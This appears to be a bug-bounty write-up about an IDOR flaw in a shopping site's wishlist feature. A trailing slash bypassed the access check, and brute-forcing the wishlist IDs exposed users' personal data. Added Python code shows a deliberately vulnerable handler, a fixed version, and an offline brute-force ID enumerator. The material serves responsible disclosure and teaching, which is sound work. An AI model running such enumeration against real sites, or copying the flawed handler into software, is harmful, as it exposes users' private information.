Supun Halangoda (Suppa)

Summary

The article details the discovery and exploitation of an IDOR vulnerability in a shopping website's wishlist feature, allowing unauthorized access to users' private information.

Abstract

In a collaborative effort, the author and their friend Hasanka, also known as WrathfulDiety, uncovered a security flaw in a shopping website's wishlist functionality. The vulnerability permitted the viewing of any user's private and public wishlists by manipulating the URL. Through methodical testing, they found that appending a forward slash ("/") to the wishlist URL bypassed the security checks, revealing the private wishlist of another user. Further investigation into the wishlist ID pattern revealed a combination of static and dynamic components, which upon brute-forcing, allowed the enumeration of all wishlists. This exposure led to the potential compromise of sensitive user data, including names, email addresses, shipping addresses, and wishlist contents. The issue was responsibly disclosed through the website's Bug Bounty Program, resulting in a reward for the finders.

Opinions

  • The author emphasizes the importance of responsible disclosure and adherence to legal and ethical guidelines when dealing with security vulnerabilities.
  • Collaboration between security researchers, in this case, the author and Hasanka, is highlighted as a valuable approach to uncovering and addressing security issues.
  • The article suggests that even seemingly minor URL manipulations can lead to significant security breaches, underscoring the need for thorough security testing.
  • The author expresses gratitude towards their collaborator, Hasanka, for his contributions and encourages readers to explore Hasanka's other security-related writings.
  • The vulnerability's discovery process showcases the meticulous nature of security research, involving pattern analysis, brute-forcing, and the creation of wishlists for comparison.

Hacking Wishlists in an E-commerce Web App (IDOR Diaries)

Hi all, this write-up is about a vulnerability found in collaboration with my friend Hasanka, AKA WrathfulDiety.

If you haven’t read the other write-ups in the IDOR Diaries series, you can check them out below.

Vulnerability

We were testing a shopping website when we came across a weird wishlist feature: we were able to view the private and public wishlists of any user on the site. The wishlist URL looked like the sample URL below:

https://www.xyz.com/find/wishlist.jsp#/1122A36R456/supun-default-wish-list

First we tried removing /supun-default-wish-list, which gave us a 404 error. The URL looked like this:

https://www.xyz.com/find/wishlist.jsp#/1122A36R456

Then we added a trailing “/” to the URL, which looked like this:

https://www.xyz.com/find/wishlist.jsp#/1122A36R456/

This returned the private wishlist of another user.
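To make the trailing-slash result concrete, here is an added Python model of a wishlist lookup. It is written for this edit and is not code from the write-up or from the affected site, whose internals the article does not describe. The router that splits the text after “#/” on “/”, the data store with owner and is_public fields, and the legacy no-slug branch as the cause of the bypass are all hypothetical. What the page does support, and what the hardened version shows, is the fix pattern for this class of IDOR: decide authorization on the object (owner, visibility) before any URL-shape handling, so “id”, “id/” and “id/slug” all receive the same answer.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class Wishlist:
    wishlist_id: str
    owner: str
    slug: str
    is_public: bool


# Constructed sample data (assumption): one private list and one public list.
STORE: Dict[str, Wishlist] = {
    "1122A36R456": Wishlist("1122A36R456", "alice", "supun-default-wish-list", False),
    "1122A36R457": Wishlist("1122A36R457", "bob", "bob-public-list", True),
}


def lookup_vulnerable(route: str, current_user: Optional[str]) -> Optional[Wishlist]:
    """Hypothetical vulnerable handler for the text after '#/'.

    Reproduces the three observations in the write-up:
      '1122A36R456'                          -> 404 (one segment, route not matched)
      '1122A36R456/supun-default-wish-list'  -> owner/visibility check applied
      '1122A36R456/'                         -> legacy no-slug branch, no check at all
    """
    parts = route.split("/")
    if len(parts) != 2:
        return None                      # 404: router expects '<id>/<slug>'
    wishlist_id, slug = parts
    wl = STORE.get(wishlist_id)
    if wl is None:
        return None                      # 404: unknown id
    if slug == "":
        return wl                        # BUG: authorization skipped on the empty-slug path
    if wl.slug != slug:
        return None                      # 404: slug does not belong to this id
    if wl.is_public or wl.owner == current_user:
        return wl
    return None                          # 403 in a real app; None keeps the example simple


def lookup_hardened(route: str, current_user: Optional[str]) -> Optional[Wishlist]:
    """Authorization is decided on the object, before any URL-shape handling,
    so 'id', 'id/' and 'id/slug' all receive the same answer."""
    parts = [p for p in route.split("/") if p]   # normalise: drop empty segments
    if not 1 <= len(parts) <= 2:
        return None
    wl = STORE.get(parts[0])
    if wl is None:
        return None
    if not (wl.is_public or wl.owner == current_user):
        return None                      # deny before looking at the slug
    if len(parts) == 2 and parts[1] != wl.slug:
        return None
    return wl


def bypass_works(lookup, route: str = "1122A36R456/", attacker: str = "mallory") -> bool:
    """True if an attacker who owns nothing can read alice's private list via `route`."""
    wl = lookup(route, attacker)
    return wl is not None and wl.owner != attacker and not wl.is_public
```

The point of the hardened version is not the slash handling itself but the ordering: the owner/visibility decision happens on the stored object as soon as it is loaded, so no alternative spelling of the URL can reach a code path that skips it.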

Now that we could bypass the wishlist access check by adding “/” to the end of the URL, we decided to dig deeper and look for an IDOR that would let us enumerate all wishlists.

Since the URL contains what looks like a unique ID, /1122A36R456/, we tried to find a weakness in the ID itself. After some investigation we found that it follows a pattern, though a weird one.

Here is the breakdown of the ID pattern.

The ID is 1122A36R456

As shown in the figure above, the static parts of the ID stay the same across wishlists, while the dynamic parts can be brute-forced. (We found this by creating several wishlists of our own and comparing their IDs: the positions that never changed were the static parts, and the rest were dynamic.)

We then set the payload positions on the dynamic parts: the first position takes two digits and the second takes three (at most 100 × 1,000 = 100,000 candidate IDs if both positions are decimal digits), and started brute-forcing.

We enumerated all private and public wishlists, which exposed each user’s name, email address, shipping address and wishlist products.
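The pattern analysis and brute force described above, as an added Python example that is not the authors’ tooling. The sample IDs are constructed, and the exact dynamic positions (the third and fourth characters, and the last three) are an assumption, since the figure from the original post is not reproduced here; the page only states that one dynamic field has two digits and the other has three. The fetch callback stands in for the HTTP request and is stubbed so the code runs offline.

```python
from itertools import product
from typing import Callable, Iterator, List, Tuple

# Constructed sample (assumption): IDs of four wishlists created by the tester.
# The write-up only says one dynamic field is two digits and the other three;
# placing them at characters 3-4 and 9-11 is our assumption, not the article's figure.
OBSERVED_IDS = [
    "1122A36R456",
    "1137A36R012",
    "1190A36R873",
    "1104A36R390",
]

Field = Tuple[int, int]   # half-open (start, end) slice of one dynamic field


def find_dynamic_fields(ids: List[str]) -> Tuple[str, List[Field]]:
    """Compare the IDs column by column.

    Returns a template with '?' at every position that varies between IDs and
    the (start, end) slice of each run of varying positions.  Positions that
    are identical in every sample are treated as static."""
    if len({len(i) for i in ids}) != 1:
        raise ValueError("all IDs must have the same length")
    width = len(ids[0])
    varies = [len({i[pos] for i in ids}) > 1 for pos in range(width)]
    template = "".join("?" if v else ids[0][pos] for pos, v in enumerate(varies))
    fields: List[Field] = []
    pos = 0
    while pos < width:
        if not varies[pos]:
            pos += 1
            continue
        start = pos
        while pos < width and varies[pos]:
            pos += 1
        fields.append((start, pos))
    return template, fields


def candidate_count(fields: List[Field], alphabet_size: int = 10) -> int:
    """Size of the brute-force space: alphabet^width for each field, multiplied.
    A quick feasibility check before sending a single request."""
    n = 1
    for start, end in fields:
        n *= alphabet_size ** (end - start)
    return n


def candidate_space(template: str, fields: List[Field],
                    alphabet: str = "0123456789") -> Iterator[str]:
    """Yield every ID obtained by filling each dynamic field with characters
    from `alphabet` (the same coverage as a cluster-bomb attack over the
    payload positions in an intruder tool)."""
    per_field = [product(alphabet, repeat=end - start) for start, end in fields]
    for combo in product(*per_field):
        chars = list(template)
        for (start, end), payload in zip(fields, combo):
            chars[start:end] = payload
        yield "".join(chars)


def enumerate_wishlists(template: str, fields: List[Field],
                        fetch: Callable[[str], bool]) -> List[str]:
    """Try every candidate and return the IDs that resolved to a wishlist.

    `fetch` is injected so this runs offline; in an authorised assessment it
    would issue the HTTP request for the candidate ID (rate limited and within
    the programme's scope) and return True on a 200 with a wishlist body."""
    return [cid for cid in candidate_space(template, fields) if fetch(cid)]


if __name__ == "__main__":
    tpl, flds = find_dynamic_fields(OBSERVED_IDS)
    print(tpl, flds, candidate_count(flds))     # 11??A36R??? [(2, 4), (8, 11)] 100000
```

With the constructed samples the template comes out as 11??A36R??? with a two-digit and a three-digit field, so 100,000 candidates cover the whole space. A small candidate count like this is exactly why short, mostly static identifiers are not an access control: the fix is the authorization check on the object, not a longer ID, though an unguessable random ID does at least remove the enumeration shortcut.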

We reported this issue via their Bug Bounty Program and got rewarded.

I should thank my friend Hasanka, AKA WrathfulDiety, for working with me on this submission. He has some great write-ups too; go check them out.

LinkedIn : https://www.linkedin.com/in/hasanka-amarasinghe/

Please remember to use this knowledge responsibly and comply with legal and ethical guidelines when conducting security assessments and disclosing vulnerabilities.

Bugbounty Writeup
Infosec
Red Team
Cybersecurity
Idor